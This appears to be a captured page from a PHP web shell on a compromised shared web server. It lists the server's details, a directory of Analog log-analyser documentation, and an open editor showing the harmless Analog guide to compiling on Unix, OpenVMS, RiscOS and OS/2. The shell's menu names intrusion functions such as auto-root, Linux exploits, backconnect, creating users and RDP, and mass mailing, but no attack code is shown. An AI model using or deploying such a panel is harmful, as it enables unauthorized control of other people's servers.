Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
analog /
docs /
[ HOME SHELL ]
Name
Size
Permission
Action
LicBSD.txt
1.76
KB
-rw-r--r--
Licbzip2.txt
1.7
KB
-rw-r--r--
Licgd.txt
2.2
KB
-rw-r--r--
Licpcre.txt
1.02
KB
-rw-r--r--
Licpng.txt
2.36
KB
-rw-r--r--
Licunzip.txt
1.29
KB
-rw-r--r--
Liczlib.txt
1.68
KB
-rw-r--r--
Readme.html
3.53
KB
-rw-r--r--
acknow.html
8.21
KB
-rw-r--r--
alias.html
10.18
KB
-rw-r--r--
analogo.gif
567
B
-rw-r--r--
anlgdocs.css
147
B
-rw-r--r--
args.html
9.26
KB
-rw-r--r--
bara8.gif
50
B
-rw-r--r--
barb1.gif
67
B
-rw-r--r--
barb32.gif
165
B
-rw-r--r--
barb8.gif
100
B
-rw-r--r--
barc8.gif
145
B
-rw-r--r--
bard8.gif
76
B
-rw-r--r--
bare8.gif
142
B
-rw-r--r--
barf8.gif
76
B
-rw-r--r--
barg8.gif
175
B
-rw-r--r--
barh8.gif
194
B
-rw-r--r--
bari8.gif
103
B
-rw-r--r--
barj8.gif
185
B
-rw-r--r--
basiccmd.html
7.88
KB
-rw-r--r--
cache.html
9.51
KB
-rw-r--r--
compout.html
6.14
KB
-rw-r--r--
custom.html
2.72
KB
-rw-r--r--
debug.html
6.93
KB
-rw-r--r--
defns.html
7.26
KB
-rw-r--r--
dns.html
6.36
KB
-rw-r--r--
domfile.html
4.16
KB
-rw-r--r--
errors.html
16.22
KB
-rw-r--r--
faq.html
49.66
KB
-rw-r--r--
favicon.ico
1.05
KB
-rw-r--r--
form.html
23.35
KB
-rw-r--r--
helpers.html
1.74
KB
-rw-r--r--
hierreps.html
7.86
KB
-rw-r--r--
include.html
13.8
KB
-rw-r--r--
indx.html
37.54
KB
-rw-r--r--
logfile.html
17.3
KB
-rw-r--r--
logfmt.html
17.78
KB
-rw-r--r--
lowmem.html
3.91
KB
-rw-r--r--
mailing.html
8
KB
-rw-r--r--
map.html
3.22
KB
-rw-r--r--
meaning.html
1.82
KB
-rw-r--r--
othreps.html
17.35
KB
-rw-r--r--
output.html
22.66
KB
-rw-r--r--
quickref.html
40.12
KB
-rw-r--r--
reports.html
15.05
KB
-rw-r--r--
start.html
2.15
KB
-rw-r--r--
startmac.html
3.66
KB
-rw-r--r--
startpc.html
4.29
KB
-rw-r--r--
startux.html
5.67
KB
-rw-r--r--
syntax.html
7.1
KB
-rw-r--r--
timereps.html
7.53
KB
-rw-r--r--
update.html
25.37
KB
-rw-r--r--
wasnew1.html
5.5
KB
-rw-r--r--
wasnew2.html
7.79
KB
-rw-r--r--
wasnew3.html
12.48
KB
-rw-r--r--
wasnew4.html
10.67
KB
-rw-r--r--
wasnew5.html
16.28
KB
-rw-r--r--
webworks.html
13.78
KB
-rw-r--r--
whatsnew.html
4.32
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : startux.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html><head> <link rel=stylesheet type="text/css" href="anlgdocs.css"> <LINK REL="SHORTCUT ICON" HREF="favicon.ico"> <title>Readme for analog -- starting to use analog (other platforms)</title> </head> <body> [ <a href="Readme.html">Top</a> | <a href="start.html">Up</a> | <a href="start.html">Prev</a> | <a href="custom.html">Next</a> | <a href="map.html">Map</a> | <a href="indx.html">Index</a> ] <h1><img src="analogo.gif" alt=""> Analog 6.0: Starting to use analog on other platforms</h1> <hr size=2 noshade> Here is the really short summary: <ol> <li>Edit <kbd>anlghead.h</kbd> and compile, if necessary <li>Edit <kbd>analog.cfg</kbd> <li>Run analog </ol> <hr size=1 noshade> Many platforms have a precompiled version of analog available. Before compiling analog, have a look at the <a href="http://www.analog.cx/">analog home page</a> to see if yours does. <p> If you're not using one of the platforms for which a precompiled version is available, you'll have to compile your own version from the source. But don't worry -- it's written in standard C throughout, so it will compile out of the box on most platforms. (The source code is the same for all platforms.) <p> First, change to the <kbd>src/</kbd> directory. <p> Then look at the file anlghead.h, and see if there's anything you want to edit. <p> When you have done that, you need to compile the program. How to do that depends on which operating system you're using. <hr size=1 noshade> <b><a name="compileux">Compiling under Unix</a></b>. First edit anlghead.h as described above. Then just type <pre> make </pre> within the <kbd>src/</kbd> directory to compile the program. On most systems, that will be sufficient, and the compiled program should appear in the parent directory. If it fails to compile, have a look in the Makefile to see if there's anything that you need to change to suit your configuration, and try again. It says in that file what to do. In particular, <b>Solaris 2 (SunOS 5+)</b> users need to change the <kbd>LIBS=</kbd> line. <p> (Experts can pass some arguments in on the <kbd>make</kbd> command line instead of by editing <kbd>anlghead.h</kbd>: e.g. <pre> make DEFS='-DLANGDIR=\"/usr/etc/apache/analog/lang/\"' </pre> This is useful if you have a script to compile analog.) <p> If you haven't got gcc, you will need to change the compiler - try acc or cc instead. <p> <b><a name="compileVMS">Compiling under OpenVMS</a></b>. You can find OpenVMS build scripts within the <kbd>src/build</kbd> directory. Unzip them within the <kbd>src</kbd> directory. Then to build Analog interactively from the command line, type <pre> $ @ Build_Analog </pre> or to submit the Build_Analog procedure to a batch queue, type <pre> $ Submit /NoPrint /Keep Batch.com </pre> The command procedure will use MMS (or MMK) if it is available, otherwise it will compile everything from raw command procedures. <p> <b><a name="compileRiscOS">Compiling under Acorn RiscOS</a></b>. The Makefile can be found in the <kbd>src/build</kbd> directly, although at this point it has not been updated for version 5 of analog. You will have to make directories called <kbd>C</kbd>, <kbd>H</kbd> and <kbd>O</kbd>, and move the sources files into the appropriate directories: e.g., <kbd>alias.c</kbd> must be renamed <kbd>C.alias</kbd>. And you will find that there are some filenames in the header file <kbd>anlghead.h</kbd> that you want to change to fit into the RiscOS directory structure. <p> <b><a name="compileOS2">Compiling under OS/2</a></b>. To compile analog for OS/2, you will need the <a href="ftp://hobbes.nmsu.edu/pub/os2/dev/emx/">EMX package</a>. You should edit the Makefile to have <kbd>OS=OS2</kbd> and <kbd>LIBS=-lsocket</kbd>. Then after editing anlghead.h and running Make, you need to run the command <pre> EMXBIND -b ANALOG </pre> to generate the analog.exe executable. <hr size=1 noshade> After you've compiled the program, leave the <kbd>src/</kbd> directory and then just type <pre> analog </pre> to run the program. (Or <kbd>./analog</kbd> if for some reason <kbd>.</kbd> isn't in your <kbd>$PATH</kbd>.) <p> You can configure analog by putting commands in the configuration file, which is called <kbd>analog.cfg</kbd> by default. Two commands you will need straight away are <pre> LOGFILE logfilename # to set where your logfile lives OUTFILE outputfile.html # to send the output to a file instead of the screen </pre> The logfile must be stored locally -- analog won't use FTP or HTTP to fetch it from the internet. There's a sample logfile supplied with the program. For help in interpreting the output, see <cite><a href="meaning.html">What the results mean</a></cite>. <p> There are already some configuration commands to get you started in the configuration file, but there are lots of others available. You can find the most common ones in the section on <a href="basiccmd.html">basic commands</a> later in the Readme, and you can read about all of them in the section on <a href="custom.html">customising analog</a>. There are also some sample configuration files in the examples directory. <p> There is one other way to give options to analog, via command line arguments, given on the command line after the program name. These are just shortcuts for configuration file commands. <hr size=2 noshade> Go to the <a href="http://www.analog.cx/">analog home page</a>. <p> <address>Stephen Turner <br>19 December 2004</address> <p><em>Need help with analog? <a href="mailing.html">Use the analog-help mailing list</a>.</em> <p> [ <a href="Readme.html">Top</a> | <a href="start.html">Up</a> | <a href="start.html">Prev</a> | <a href="custom.html">Next</a> | <a href="map.html">Map</a> | <a href="indx.html">Index</a> ] </body> </html>
Close